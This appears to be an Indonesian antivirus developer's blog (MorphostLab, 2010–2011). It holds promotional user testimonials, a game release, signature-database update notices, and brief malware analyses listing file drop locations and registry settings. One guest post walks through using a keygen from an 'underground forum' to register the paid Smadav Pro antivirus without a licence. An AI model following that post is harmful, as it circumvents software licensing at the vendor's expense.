MorphostLab

Tempat nongkrongnya Morphic dan kawan-kawan

Great Testimonial For Morphost Antivirus

Posted by Morphic pada Januari 7, 2011

Saya sangat berterima kasih kepada seluruh masyarakat Indonesia terutama mereka yang menggunakan Morphost Antivirus. Terima kasih telah menaruh kepercayaan pada Morphost Antivirus sebagai guard di sistem anda semua.

Saya mengutip sebagian kecil dari sekian banyak testimonial mengenai Morphost Antivirus dari dunia maya.

 

Abu Proxima Centauri: Makasih om. Maju Antivir Lokal Indonesia. (22 jan)

AgusFerdi: ….. Hormat kami BTK (banyak terima kasih), Semoga bisa menjadi Konsultan atau profesor ANTIVIRUS KOMPUTER (semoga juga medis/kedokterannya … amin). Sekarang aku jadi PD kalau mengenalkan/menyebarluaskan tentang antivirus lokal yang hebat ini ….., BTK.

Akhmad Efendi: ==>>> I LIKE MORPHOST <<<== makasih bangets Mas Morphic,, q akn membantu semampuq buat Morphost jadi better,, (8 Sept)

Albar: aku baru aja download morphost, lagi nyoba (24 Feb)

Alexander Siregar: mantap banget ni antivirus!!! (27 jan)

Andy: mas, aq suka bgt ma morphost AV, tapi aku masih lum tau apa-apa soal AV, mohon bimbingannya (16 April)

Anu: waw morphost dah mau go internasional yah ceritanya, slamet deh  moga bisa bersaing dg av lokal lainnya, (31 Jan)

Aprilio Kevin: Bravo MORPHOST!!! Hebat! Sungguh Fantastis! Meskipun kuganti formatnya jadi screensaver, tetep bisa diload!!! Bat, apalah, bisa! (4 juli)

Ardhi Muhassabah Hasni: udah ngak sabar nieh mau download Morphost 8, karena sy pakai morphost udah 1 tahun lebih!!!!!! Morphost digabungin ama anti virus Avast Edisi 5, Mantap abies….N sampai2 PC aku aman dari virus2 yg jahat…….. (10 des 2010)

Ardy Prologic: Sip.. Sip…. aq dukung 99,99%..  thanks yaa…;) (8 Sept)

Aria: ijin dongdot um morphic…..love u pulll hahahahaha (4 nov)

Ayip: akhirnya morphost rilis yg baru dengan nambah fitur khususnya basmi virus shortcut..

btw, kok blom ada fitur exception list program ato folder?? fitur ini padahal udah ada di smadav ama CMC (RTP exception). mungkin ini cuman masukan aja untuk rilis morphost kedepannya… thanx.. (2 Okt)

B_agoy: Updated… Maju terus Morphost….   (12 des)

Bambang Pradoto: Numpang download dan ijin share ya bos..sukses selalu buat morphost^_^ (1 Okt)

Banghasmi: mank mantap ah. maju terus programmer medan (14 April)

BangTom: ahhh, Gagal PertamaX download gan!! mantap deh Morphost! makin jaya ajoo!! (8 Sept)

Bimo Eko Laksono: Go Go Go Morphost Antivirus !!!! (10 April)

Bimo: Morphost Super wkwk (8 Sept)

Blitz: Halo Morphost Ikut Nyumbang Opini oke :D:D (23 Nov)

Blogger Newbie: kutan nyobain bro ane, smga AVnya makin mantebs, hehehe . . . (2 sept)

Bobby315: wah udah keluar versi baru, coba ah ^^ (tampilannya dah bagus dan terlihat rapih). (1 Okt)

Buddy Absara: udah kucoba…. ternyata bagus banget… (28 jan)

Cantigi: salam kenal. smart! saya suka kalimat ini: “Database Morphost gw bagi dalam beberapa kelompok sehingga seolah-olah database Morphost cuma memiliki sedikit jumlah defenisi database. Gw sengaja buat kayak gini supaya kecepatannya nggak terlalu lambat”. ciri pola pikir cerdas, mirip dynamic link library (DLL) dan OOP, katagori terbagi dalam beberapa kelompok. main engine semakin cepat. update database anti virus semakin mudah. kadang, pemikiran sederhana justru jadi solusi bagus. saya sendiri sudah jauh tertinggal. dulu cuma pake assembly aja. sekarang core dan idealismenya udah beda.  keep on spirit, being explorer and keep moving. good work!.  (18 Juni)

Chaszd: Izin sedot bos… gw denger u anaq Medan ya bos… dari Smansa ya bos…? gw juga anaq M_edan… salam kenal….  Maju trus Antivirus Medan…. gw support deh….    (28 januari)

Chelly foxxy07: Yaa memang nich AV bagus banget cuz aku pake yang lain sama aja ngak mempan….salut dech…Thx yaaa infnya…Thx banget…jadi aku ngak kesal lagi ma AV. (3 Juni)

Coe88: Kereeeen,,akhirnya rilis juga uY. Keren bang morphic. Sukses deh ma morphost nya. (1 Okt)

Copral: maju terus_.smangat phic (3 Okto)

DahLha Lhie: thanks to team MORPHOST ANTIVIRUS, trus berkarya dan sukses slalu…. (17 sept)

Dedi Landscaper: Good… klo bs Morphost kembali ke bentul lama, lebih bgs tampilanx.. (30 oktober)

Devran Devranstation: morphost itu av lokal paling canggih tapi kurang halus dikit tampilannya (9 des)

Dewa: Maju terus Tim Morphost !!!!! (10 Maret)

Dian Noveria: kalo menurutku Morphost jauh lebih bagus dibanding smadav. (27 jan)

Dimas Aditiar: Ayo Morphost! Segera rilis Morphost versi 9! (28 Nov)

Dio: thanks bro sukses terus av morphost. gw saran tampilan terbaru lo bikin lagi biar terlihat lebih menarik (19 Nov)

Diyan: Morphost makin hebat aja. Teruskan perjuangannu phic. (11 des)

Djayadie Achmad: thanks morphost,mudah2an semakin terdepan……… (15 okt)

Donny Irawan: Trima kasih Morphost… hampir semua jenis Anti Virus lokal sdh sy jajal, ada 1 kelebihan Morphost yg sangat membantu sy, yaitu bisa singkirkan Sality yg menyebalkan… trims (17 jul)

Efrey EddjhaYaneecinandetigan: youpzz,,, mank mantap!!! qren……….. (14 mar)

Emfuad El-keimplietey: orang medan memang top,thank unt morphost nya (13 nov)

Endriash: wah morphost 8 makin keren dgn animasinya + anti keylogger. Maju terus Morphost (1 Okt)

Eon of Dooms: Semoga Allah yang akan membalas kebaikan yang dilakukan Oom Morphic, dan semoga elmunya nambah dan kita kita dibagi sama Oom morphic Amiin ! (18 sept)

Es Tung Tung: Mhorpost is are the real AV (21 Des)

Fadli Alam: milikx nak medan Horas bahhh… 🙂 (14 nov)

Farid Pratama Kartanegara: Thanks banget buat para team dari Morphoser dengan ilmunya.. semoga bermanfaat . . . (15 sept)

Fredy Hari: morphost udah bisa hajar Malingsia di komputer gw. (27 jan)

Gd Andika: halo morphost. makasi buat antivirusnya . (20 sept)

Gelar Aulia: Mantep gan langsung bersih…Hatur nuhun pisan.. (4 sept)

GilangRangga: wow ! ajib nih anti virus….  saya tunggu morphost 8 nya…. sekalian kalo bisa bikin file recorver buat virus runonce soal nya kena mulu nih virus…. (27 sept)

Hidi Hamid: mantaaaaap sekali bro….. by hidi. at tilamuta boalemo city (22 Sept)

Hikam Pinggir Mbaro: KEREN. COOL. MANTEB. POKO’E JOSS. (10 des)

Icank: morphost AV?? this is amazing!!cool thxb4 (6 okt)

Ichal Rebel: Terima kasih banyak yach, berkat antivirus ini semua virus di komputerku sirna.. (23 Agust)

Ipok Kane: hmmm ijin nyobain morphost ya, Tetap Berkarya.  SmangaDD Pak !! (26 Sept)

Irfan: Bang Mantap.. Antivirus nya.. Bang Tolong Tmbahkan Anti Keyloger ke dalam Database dong biar keylog di warnet bisa di Kill.. Coz warnet sekarang banyak KeyLog nya.. Trimakasih mas.. (25 sept)

Jek: sekarang aku pake morphost 8 & avast 5 free,,,trus pas tadi tancapin falsdisk punya teman yg ad virus shortcut, ternyata autodetect punya morphost langsung detect,,trus bisa di delete dgn mudah!!! trims om morphost,,,jangan berhenti berkarya!!!! (12 Okt)

Joris: Download n langsung test. Ijin pajang di BLOG ane………:) (1 Okt)

Kevin: YE!!!!!! Dah ad Morphost v.8………. oh… namax V8!.. (1 Okt)

Kholis Virologist: Go to Morphost (20 Des)

M Lintar Hendawan Yusman: i love MORPHOST ANTIVIRUS..by gilar (10 des)

Mamendace: great…..maju terus morphost…!!! (6 Juli)

Mankbut: Brow… Av km dah aq pasang di blog aq   (4 juni)

Mat Item: Hidup Morphost!!! (11 Juni)

Maxx: Keren phic, gw suka yang satu ini. Nggak ribet kek dulu, tapi kok toolsnya ada yang dihilangkan? Tapi gw salut, karena satu2nya AV indonesia yang mengenali virus shortcut dan folder hasil shortcut dengan baik. Kembangin terus morphostnya…!!! (2 Okt)

Miftah: mantabs kawan :D. lanjutkaan !! (10 Des)

Muamar: sip…. lanjutkan phic! (9 Sept)

Mushanokoji Fujikage: morphost is the best … (30 okto)

Mustopaltoto: mantap kang antiviusnya fitur berlimpah. sukses terus dan terus berkarya antivirus ini akan saya revew di blog saya (2 sept)

Natanael Devianto: sip gan, ane cinte produk lokal gan, hohohoho (16 nov)

Nightmare9: morphost semakin canggih. salam kenal. (30 Des)

Oneboelle: Terus terang, kalo komentar, aku paling segan dehh.. Tapi buat Morphost ini,…  athabbbzzz…!!! Mungkin aja karena kebetulan virus yang aku dapat ini, ada dalam data-list-nya Morphost. Tapi biar gimanapun, sekali lagi, thanks beratzz..!!

Papa Rock’nRoll: izin sedot gan….tuinggg….! rekomendasi teman untuk membersihkan virus shortcut yang udah sembunyi banyak file folder dikomp ku.. moga bisa lancar!!! (8 nov)

Prince Stifler: lebih bagus dari sm***v… (23 feb)

Programmer: smadav 8.3 dan morphost ternyata bisa saling menutupi kelemahan dan morfos lebih kuat hadapi trojan.trims fo all (22 Des)

Ratno Andes: aku salut sama morphost..smoga aj bisa lebih baik lagi. dan smoga bs mnjadi amal buat morphic.. goodluck…teruskan perjuangan mu dalam membantu masyarakat sosial.. yang penting kontribusi kita. (4 Jan)

Renzi: mantap gan… numpang sedot y.. _-_-_THX_-_- (25 sept)

Rere Labaso: thanks MorphostLab, for catching the virus that has been annoying me (11 nov)

Rinta: wah pertama baca keren bgt nih kyknya,,,udah aku download n nih udah mulai scan (29 Juni)

Risanet: makasih pak, saya mau coba morphostnya memang ini yang saya cari saya ribet ngadapi shortcut itu flasdisk yang ke colok pc selalu terkena shorcut, sama smadav itu gak kedeteksi sama kayak ms-dos shorcut memang terdeteksi tapi tidak bisa di hapus dan di protek sama smadav, semoga dengan morposht teratasi (18 sept)

Riyan: Wuih, sudah coba. Mantap banget sekarang. Salut! Segitu aja dulu deh testi-nya. Aslinya masih banyak yang mau diomongin, cuma masalahnya gak tau apa yang mau diomongin, hehe. Lebih enak add FB-ku aja ya, hehe. Terima kasih. (12 Okt)

Rizal: thx bgt Morphost-nya. kompie ku kena virus ini udah di scan pake PCMAV+Clamav yang terdeteksi Virus trojan.VB707 (kl ga salah). kirain udah bersih ternyata setiap install atau uninstall selalu muncul Nita_worm washere.exe bukan program files (21 Jan)

Ronal: THANKS ya bro av mp dah banyak membantu kerjaanku KEEP LEARNING (24 Juni)

S4dly_92: maju truzz pantang mundur, phic jangan lupa minum obat anti lupa ya, hehehehehehehehehehe (20 Juli)

Satryacode: Waahh…. Mantap phic … Semangat !! (9 Sept)

Shafry: hbt. Maju terus Morphost (5 Februari)

Silver Fox: Makin mantap aja morphost. Semangat phic (16 Des)

SiLvia NathaSya: Morphost keren… (27 jan)

Smartfix AV: Good job phic….Terus sharing n sama2 berbagi sesama pecinta IT/TI Viva programer indonesia…Cintai dan hargai Hasil karya anak bangsa…Salam sejahtera buat sesama AV maker se indonesia…. (20 Sept)

Sonny: Akhirnya yg d tunggu2x selesai juga. Numpang Download ‘n’ test dlu… Thanks buat Mr.Morphic, sukses slalu buat Morphost-Nya. Good Job… (30 Sept)

Sonya Arih Mehuli Ginting: wooaaa…. ini antivirus lokal yang keren!!!! (10 februari)

Taufiq Mw: ‎. akhir.a Morphost expert kluar jg, . thxz yo mas morphic, (26 jan)

Tiop Maruntung Pasaribu: moga Morphostlab MAJU trus bro… (2 apr)

Tito: Morphost emang kereeeen…. (23 Sept)

Underground’s President: wew, cool (8 Des)

VirsSpector: Salluuuttt buat Morphost Antivirus, terutama Accords, karena saya memakai laptop Windows 7, dan saya terlalu MALAS untuk menginstall Antivirus, tapi tentu saja, saya Was-Was pake komputer (atau tepatnya laptop), karena tahu tidak ada antivirus. Eh, ngeliat tuh Morphost Antivirus Accords, pengen nyoba, jalanin deh RTPnya… (13 Okt)

Virut_virus_parah: Sudah dapetin Morphost Expert + dbnya yang paling baru. Salut deh ama cara download-nya yang guampaaanngggg…… (6 juli)

Vx: wew mkin mntp ja ne gan. Heheheheheheh (9 Okt)

Welly Samodra: Makasih. dah ada update database baru… Salut buat Morphost antivirus, pengalamanku pake Morphost Antivirus, virus yuyun atau virus serviks bisa dideteksi dan dihapus. Dan bisa hapus fake shortcut yg dibuat oleh virus Serviks. Antivirus lain belum bisa mendeteksi fake shortcut ini. (10 Agustus)

Widycom: Bagus bro, meju terus indonesia (1 Okt)

Wifree Crow’d: salut buat morphost anti virus (3 nov)

WormArchive: makin expert aja ne morphost… mantabh dahh… (15 Maret)

Wumbo: mantap gan!! virus bluefantasy yg dah ngendog di lappy ane selama 6 bulan habis dalam waktu 2 hari(hari pertama abis ngerjain tugas soalnya XD) soalnya ane pake WinME sm*d*v gk bisa…. lagi jalan2 di CCPB nemu ginian XD  thx banget gan :cendolbig (18 Des)

Xhadow: smangat mantap morphostlab B) (10 Juni)

Yigal Viru9: Wih keren morphost 8 nya………… (15 Okt)

Yudha: morphost the best lah (10 des)

Yustian: ampuh gan,thx yo,trs up date yowww (6 sept)

Zainul789: Wah..manteb bener!! ijin posting di blog sy ya.. (1 Okt)

Zeus: Thnk’s Sob, database agustus dah ak download nich! Sukses selalu! (10 Agust)

 

Terima kasih untuk Indonesia
by:Morphic Karta (Samuel Pola Karta Sembiring)

Iklan

Posted in Uncategorized | 12 Comments »

Mainkan Game Santa in Maze! Bantu Santa Klaus Kumpulkan Kado Natal!

Posted by Morphic pada Desember 28, 2010

Mungkin game ini agak terlambat dirilis. Yang harusnya dijadwalkan akan dirilis sebelum natal, namun ternyata dirilis sesudah natal. Walau demikian, saya harap game ini tetap bermanfaat atau paling tidak dapat menghibur para pemainnya.

Game ini ditujukan bagi siapa saja yang berminat untuk mencobanya. Tidak ada batasan umur. Tua muda siapa saja boleh. Game ini sederhana dan tidak butuh skill apapun untuk bermain. Ibarat game-game maze lainnya, kamu hanya perlu menggerakkan tokoh dengan tombol key (up,down,left dan right) yang ada pada keyboard.

Game ini mengisahkan tentang santa klaus yang harus mengumpulkan kado-kado yang tersebar disetiap sudut maze. Semua kado harus dikumpulkan lengkap karena memang semuanya harus dibagi saat natal. Nah, yang menjadi masalah, di tiap level maze telah diprogram beberapa musuh untuk menghalangi Santa saat mengumpulkan kado. Musuh-musuhnya adalah monster boneka salju dan monster kue jahe.

Setiap satu kado yang dikumpulkan nilainya 100. Dan game ini akan selesai dengan nilai 21900 poin. Selain kado, ada juga macam-macam buah yang telah disediakan. Nilai poin dari buah-buahan ini bervariasi. Saat bermain kumpulkanlah seluruh kado dan buah-buahan untuk mendapatkan nilai poin. Usahakan untuk tidak meminum bir yang sengaja telah dibuat di setiap level. Jika santa meminum bir ini, santa akan mabuk dan kamu akan kehilangan kontrol pada si Santa.

Santa diberi tiga nyawa saat bermain. Jika Santa tertangkap oleh monster maka otomatis permainan diulang dan nyawanya berkurang satu. Tapi tidak usah khawatir. Dalam beberapa level tertentu disedikan bonus nyawa secara gratis. Kamu juga bisa melindungi diri dengan shield ataupun pelindung yang ada pada setiap levelnya.

Begitu aplikasi dibuka, ada tiga pilihan. “Main”, “About Me” dan “Keluar”. Langsung saja klik “Main” dan kamu akan langsung bermain?!


Nah, ini adalah gambar game ini di level pertama. Langsung saja mainkan!

Banyak kekurangan dari game ini sebenarnya, jadi saya mengharapkan kritik dan saran yang membangun pada saya. Cukup tinggalkan komen disini?!

Silakan download game ini.
DOWNLOAD GAME SANTA in MAZE!

Sekian dan terima kasih, Selamat Natal 2010 dan selamat menyambut tahun baru 2011.

By: Samuel Pola Karta Sembiring
Thanks to:
-Tuhan Yesus atas kasihNya yang tak terbatas.
-Kedua orang tuaku, untuk semua kebaikan kalian
-kakak dan adikku, tetap sukses buat kalian ya
-Teman-temanku: Yose, Abed, Sonya, Lidia, Tunggul, dan Tiop. Tetap semangat kuliah. Mari
-Sri Kurniati Agustina Sitepu, thanks atas perhatian dan waktunya.
-Teman-teman di MorphostLab, untuk semua dukungan penuh kalian
-Seluruh friendlist di FB-ku
-Seluruh anak-anak Indonesia.

Posted in Uncategorized | 4 Comments »

Morphost Dapatkan Kembali Citra Namanya!

Posted by Morphic pada Desember 10, 2010

Kalau satu bulan terakhir Morphost dikenal sebagai antivirus yg suka false dengan file “CCleaner”, nah kali ini Morphost sudah akur dengan software tersebut.

Artinya MorphostLab telah menghapus satu signature untuk software CCleaner, namanya “Fake-Scanner”.
Begitu banyak laporan yang masuk, tentang hal ini. Maka secara inisiatif saya menghapusnya..

Nah, dalam kesempatan ini juga, saya akan membagi database Morphost bulan Desember.
Berhubungan bulan ini banyak kesibukan dan juga kontribusi sampel virus yang sedikit, maka jumlah penambahan virus juga sedikit. Saya sangat mengharapkan pada pengguna Morphost sekalian untuk membantu dengan mengirimkan sampel-sampel virus yang ada disekitar anda kepada kami (dalam format rar/zip berpassword)

Silakan download Database Morphost bulan Desember 2010

Artikel kali ini mungkin amat singkat. Malah singkat sekali.
Tapi setidaknya di artikel kali ini, anda semua telah tahu bahwa pemakaian Morphost semakin aman dan terpercaya! Terima kasih!

by:
Morphic, Samuel Pola Karta Sembiring
http://www.morphostlab.com

Thanks to:
-Mas Yudha
-Satryacode
-Muamar Kudo

Posted in Uncategorized | 24 Comments »

Waspadai Virus WordInfo! (Download Database Morphost November 2010)

Posted by Morphic pada November 9, 2010

Setelah vakum beberapa lama, akhirnya analisis virus MorphostLab kembali lagi. Tentunya bersamaan dengan rilisnya database bulan November 2010.
Nah, untuk hasil analisis kali ini, kami sengaja memilih worm “WordInfo” (nama menurut MorphostLab).

Ciri fisik Malware:
-Nama Malware: WordInfo
-Ukuran: 132 KB (135,168 bytes)
-Icon: Microsoft Word 98
-InternalName: Win32App402c
-Company: 128 KB

Berdasar analisis saya, worm ini mendrop duplikasi filenya di:
-C:\MSystem.com
-C:\WINDOWS\Installer\Installer.com
-C:\WINDOWS\System32\PChealth.com
-[Drive]:\rootInfo.exe
(catatan: anggap drive C sebagai system)

Worm ini juga menghidden file:
-C:\Windows\regedit.exe
-C:\Windows\System32\regedt32.exe

Diduga worm ini menyebarkan file duplikasinya ke dalam setiap folder dengan filename yang sama dengan nama folder serta penambahan nama “Info” dibelakangnya…
Misal di dalam folder “Morphost” ada worm ini dengan filename “Morphost Info.exe”

Tidak ada hal yang signifikan dari worm ini sebenarnya…

Akan tetapi, jika anda merasa komputer anda telah terinfeksi worm ini tidak ada salahnya untuk mencoba Morphost Antivirus Lokal.

Malware-malware yang ditambahkan antara lain:
Adult
Anti-Icon
Disentry
Fake-McAfee
Fake-Winamp
File Deleter
Ghost-1
Microjoin
MouseDisable
NS-1
NS-2
NS-3
NS-4
NS-5
NS-6
NS-7
Playboy-C
Qvod
RS.Module
Sabotage-HE
Virus-014
WinAV
WordInfo
Worm.VB-5

Silakan download. Semoga dengan database terbaru ini, komputer anda dan laptop anda semakin terjaga.
Terima kasih.

Download Database Morphost November 2010

Posted in Analisis Virus | 25 Comments »

Morphost Antivirus Versi 8 Dirilis!

Posted by Morphic pada September 30, 2010


Morphost Antivirus Versi 8
Kali ini MorphostLab kembali merilis antivirus terbarunya. Morphost Versi 8. Banyak revisi dan pembaharuan pada versi ini dari versi sebelumnya. Mulai dari detektor, scanning, database dan tools-nya. Namun pada dasarnya Morphost versi 8 ini hampir sama dengan versi 7.

Tampiilan lebih landscape!
Kalau versi-versi Morphost sebelumnya terlihat portrait, versi kali ini Morphost dibuat lebih landscape. Morphost versi 8 ini terlihat lebih menawan dibanding versi sebelumnya. Ditambah lagi campuran warna hijau muda dan tua-nya yang makin fresh. Tidak seperti versi-versi sebelumnya yang hanya menggunakan hijau tua saja.

Move-up and move down! Come on guys!
Morphost versi 8 makin ter-animasi saja! Kalau anda menekan tombol “scanning” dan “database” tombol lain akan bergeser move-up and move-down. Anda bisa coba sendiri. Selain itu, listview untuk “Virus Found” dan “Dugaan Virus” juga telah menggunakan teknik ini. Geser kanan dan geser kiri!

Bagaimana dengan tools barunya?
Sebenarnya tidak banyak penambahan tools di versi baru ini. Tapi ada satu tools yang cukup bagus di versi ini. Anti-Keylogger‼! Nah, tools ini bisa anda gunakan untuk mengecek apakah ada keylogger di komputer anda. Sangat cocok digunakan di komputer warnet dan komputer-berbagi.

Apakah Morphost versi 8 mati saat scanning?
Nah, untuk menjawab pertanyaan ini, perlu penjelasan yang cukup rumit. Untuk kerusakan pada versi 7 kemarin telah diperbaiki di versi 8 ini. Tidak ada lagi yang namanya “Mati saat scanning” pada versi 8 ini.
Tapi di beberapa komputer yang jumlah filenya sangat banyak (luar biasa banyak), terkadang Mophost bisa not-responding. Ini bukan diakibatkan karena kerusakan pada scanning Morphost, melainkan karena Morphost tidak kebagian memory.

Penambahan 6 Detektor Baru!
Ada enam detektor yang ditambah di versi kali ini. Dua detektor untuk induk virus, satu detektor untuk keylogger dan 3 detektor lain untuk shortcut virus. Nah, Morphost versi 8 ini dijagokan untuk memproteksi komputer dan laptop dari virus-virus shortcut yang belakangan ini beredar. Dan banyak flashdisk yang terinfeksi karena malware ini.
Dengan Morphost 8, virus yang menghinggapi flashdisk anda dapat terdeteksi! Kami sebut virus ini “RandomShortcut”

Cara update database-nya makin gampang!
MorphostLab telah memudahkan anda semua untuk mengupdate database Morphost. Hanya satu kali klik, tunggu hingga 100%, database Morphost telah terupdate‼! Tentunya dibutuhkan koneksi internet untuk hal ini.

Bagaimana dengan RTP Morphost?
RTP Morphost sampai saat ini berstatus “siap menjaga komputer anda”. Morphost telah stand-by mengeluarkan alarm jika ditemukan virus. Ada sedikit perubahan tampilan RTP-nya. Dan kini RTP pun sudah lebih baik dibanding RTP sebelumnya.

Buzz! Buzz! And BUZZ‼!
Anda tahu efek Buzz pada YahooMessenger? Kalau anda sering ber-YM tentu anda tahu istilah “BUZZ”. Jadi efek buzz ini seperti efek bergetar…
Begitu Morphost menemukan virus, RTP Morphost akan bergetar alias “nge-buzz”‼!

FalseAlarm makin kecil!
Nah, belajar dari pengalaman versi terdahulu, kemungkinan false alarm pada versi 8 ini telah diperkecil. Kesimpulannya, anda tidak perlu takut lagi dengan false alarm. Morphost telah membagi dua kolom semua hasil deteksinya. Kedua kolom itu adalah “Virus Ditemukan” dan “Dugaan Virus.” Jadi semua yang masuk ke dalam kolom list “Dugaan Virus” masih berstatus “DUGAAN”

Mari download Morphost versi 8.
Anda bisa download Morphost versi 8 disini.
DOWNLOAD MORPHOST ANTIVIRUS VERSI 8

By: Morphic Karta

Posted in Uncategorized | 122 Comments »

Bosan Dengan Virus Shortcut di Flashdisk? Nantikan Morphost Versi 8! (Download Database September 2010)

Posted by Morphic pada September 8, 2010

Menurut pendapat saya, virus shortcut yang saya maksudkan ini adalah malware yang cukup terkenal belakangan ini. Dari 15 flashdisk teman setiap minggunya, saya menemukan 10 flashdisk terinfeksi malware ini.

Apakah ini worm? Ataukah ini virus?
Malware ini sebenarnya bukan virus, karena dia tidak membutuhkan file apapun sebagai inangnya. Malware ini mampu bertahan sendiri, ini sebabnya malware ini dikategorikan sebagai worm. Tapi bukan sembarang worm. Worm ini memiliki teknik polymorphic yang cukup baik. Mampu mengubah strukturnya sendiri dengan sempurna, sehingga antivirus lokal tentunya tidak bisa mendeteksinya hanya dengan checksum.

Meski malware ini tergolong worm, tapi banyak yang menyebutnya virus. Mengapa? Kamu harus tahu. Tidak semua orang di Indonesia adalah orang yang Expert. Banyak orang yang sangat tidak tahu menahu soal malware.
“Semua jenis Malware disebut virus”
Maka sebenarnya tidak salah kalau worm, trojan, atau apapun itu disebut virus. Sebab sudah seharusnya juga anda (yang lebih expert) bisa menyampaikan hal-hal yang mudah dimengerti oleh orang awam.
Intinya jangan sok! Dengan sok menyebutkan istilah-istilah rootkit atau exploit yang tidak dimengeti oleh orang biasa.

Beberapa hari yang lalu, saya dikritik habis-habisan karena menyebut malware shortcut ini “virus”. Sebenarnya saya tahu ini adalah worm. Tapi karena saya sudah terbiasa menyebut istilah malware sebagai virus, maka saya sebut “virus.”

Dunia sendiri juga sudah setuju hal ini. Mau buktinya? Di dunia dikenal istilah “Antivirus” bukanlah “AntiMalware”
Begitu juga dengan produk-produk software seperti Norton Antivirus bukan “Norton Antimalware”

Cukup segitu saja ya penjelasan dari kekecewaan saya. Sebab banyak sekali orang sombong sekarang ini, yang suka mengkritik-kritik istilah virus, worm, dan kelas-kelas malware lainnya.

Oke. Kembali ke masalah!
Kami telah menemukan satu metode khusus untuk mendeteksi worm ini. Jadi induk-induk dari worm ini bakal terdeteksi. Kami sebut “RandomShortcut”

Tapi sayang, untuk Morphost versi 7 alias Morphost Expert Plus metode ini belum ditambahkan. Jadi terpaksa mau tidak mau kami menggunakan signature checksum saja pada database Morphost.

Untuk shortcutnya juga sudah bisa dideteksi dengan Morphost versi 8.

Nama file induk bermacam-macam. Kami simpulkan filename induk malware ini random…
Varian terakhir yang kami dapatkan adalah
-adanya file X.exe
-adanya file random.exe
-adanya shortcut-shortcut folder
-adanya shortcut-shortcut khusus seperti “Password”, “Pictures”, “Video” dan lain-lain.
-adanya file-file shortcut dengan icon tidak jelas, dengan filename 3 huruf diawali huruf “z” kecil.
-adanya file “zzz.dll”

Biasanya sekilas melihat isi flashdisk kita, seolah-olah semua folder kita sudah diubah menjadi shortcut (walaupun sebenarnya dihidden).
Dan satu hal lagi yang perlu kami tekankan. RandomShortcut adalah malware kedua setelah Trojan Fanny yang kami peroleh, yang mampu menginfeksi komputer tanpa dieksekusi langsung.
Artinya, begitu kamu buka flashdisk kamu (walau dengan cara apapun untuk menghindari autorun dari si malware) komputer langsung terinfeksi.
Akan muncul process baru “ALG.EXE”

Yah, mungkin sekian saja, reviewnya ya…
Dan kali ini kamu bisa download database Morphost untuk bulan September 2010

Nama-nama malware yang ditambahkan di database Morphost September 2010
AhGen6
Autoit-L
Cebo
Cebo.Compnt[1]
Cebo.Compnt[2]
Cebo.Compnt[3]
Cebo.Compnt[4]
Cebo.Compnt[5]
Cebo.Compnt[6]
Cebo.Compnt[7]
Cebo.Compnt[8]
Conficker.Var[18]
Conficker.Var[19]
Daemon
Fakh-Crasher
Fakh-Xtrax
Intimidate
RandomShortcut[1]
RandomShortcut[2]
RandomShortcut[3]
RandomShortcut[4]
Serviks.Var[3]
Serviks.Var[4]
Smadsoft
Smadsoft.2
Stuxnet.Var[1]
Vhier10
VirFighter
Virus-011
Virus-012
Virus-013

Silakan download database Morphost September 2010

by: Morphic
thanks to:
-Yudha atas semua kiriman malwarenya…

Posted in Uncategorized | 132 Comments »

Bug Key Smadav by: Fakhricker

Posted by Morphic pada September 4, 2010

Hai perkenalkan anama ane FAKHRICKER ne…
T_T
Kali ini kita bahas cara melegalkan key smadav pro dengan nama kita sendiri
Ne software ane dapat di forum underground ane
^^
Langsung aja ya
Pastikan smadav aktif di komputermu
Buka smadav keygennya
Lalu isi dengan namamu.

Trus buka smadav mu, trus pada bagian tabnya isikan
Copy pastekan nama dan kode yg ada di bawah namamu

Trus klik register
Maka hasilnya
Tolong dibantu yah…
Bim salabim jadi apa
Plok… plok… plokkk

Tarrraaaaaaaaa…………

Gimana hebatkan untuk sementara ane belum tahu cara kerjanya.
Mungkin teknik sniffing
^^

Salam hangat
From: Fakhricker
Medan City

Kunjungi blog sederhana ane di: www.Pinginusil.blogspot.com

Posted in Uncategorized | 36 Comments »

Worm ‘Acehku’ Manipulasi SwapMouseButton (Download Database Agustus 2010)

Posted by Morphic pada Agustus 10, 2010

Sebenarnya teknik ini bukan lah teknik rahasia. Sebab sudah banyak juga kok yang pakai teknik ini. Dan ini bukan lah satu teknik yang perlu dibanggakan, karena hanya keisengan saja.

Sebagian dari pembaca yang sudah kenal dengan istilah “SwapMouseButton” mungkin sudah pada tahu. Tapi bagi anda yang belum pernah mendengarnya tidak ada salahnya untuk melanjutkan membaca artikel ini.

Sebenarnya saya sendiri juga tidak tahu pasti definisi “swapMousebutton” ini. Tapi sederhananya, istilah ini merujuk pada penukaran fungsi klik pada mouse.
Manipulasi nilai pada “SwapMouseButton” akan menukar fungsi klik kanan dengan klik kiri

.
Perhatikan gambar tersebut! Normalnya tampilan tersebut muncul jika mouse diklik kanan. Namun dalam kasus yang berbeda (misalnya kasus worm Acehku), tampilan diatas muncul jika klik kiri.

Saya kira anda pastinya sudah mengerti sampai disini.

Sebenarnya pengaturan SwapMouseButton ini ada di Control panel.

Tapi bisa juga diatur lewat regedit.
Ini alamatnya:
“HKCU\Controlpanel\Mouse\SwapMousebuttons”
Jika nilainya “0” berarti normal.
Jika nilainya “1” berarti tidak normal.

Lalu apa kaitannya dengan worm “Acehku”??
Ya, saya sengaja masukkan nama worm ini ke dalam judul, sebab worm ini termasuk salah satu worm yang memakai teknik ini. Sekaligus worm Acehku termasuk worm baru di beberapa bulan terakhir ini.

Cukup sekian saja. Terima kasih.

Berikut nama-nama malware yang ditambahkan ke dalam Database Morphost bulan Agustus.
Acehku-C
AhGen5
AvKiller
CnDrive32
Conficker.Var[16]
Conficker.Var[17]
Cronograma-A
Cronograma-B
CyberGate
ErtModule
Fake-MsUpdate
Friendster-UNPI
Harlug
Loader.Troj
Miod
Pedmiq
Serigala
SpyGen
Virus-009
Virus-010
Virus-011
Winlogauto
Worm.VB-4
XPack-MP3


Download Database Morphost Bulan Agustus 2010

By: Morphic Karta
(Samuel Pola Karta Sembiring)

Thanks to:
-yudha
-satryacode
-muamar kudo
-irez
-bian

Posted in Uncategorized | 43 Comments »

Cara Membersihkan Virut Ala MorphostLab

Posted by Morphic pada Juli 25, 2010

Virut salah satu virus yang cukup terkenal di dunia, sekaligus memiliki banyak sekali kasus di dunia. Antivirus luar rata-rata sudah bisa mendeteksi virus ini. Karena memang butuh detektor khusus untuk virut, jadi tidak banyak AV lokal yang mampu mendeteksinya dengan baik.

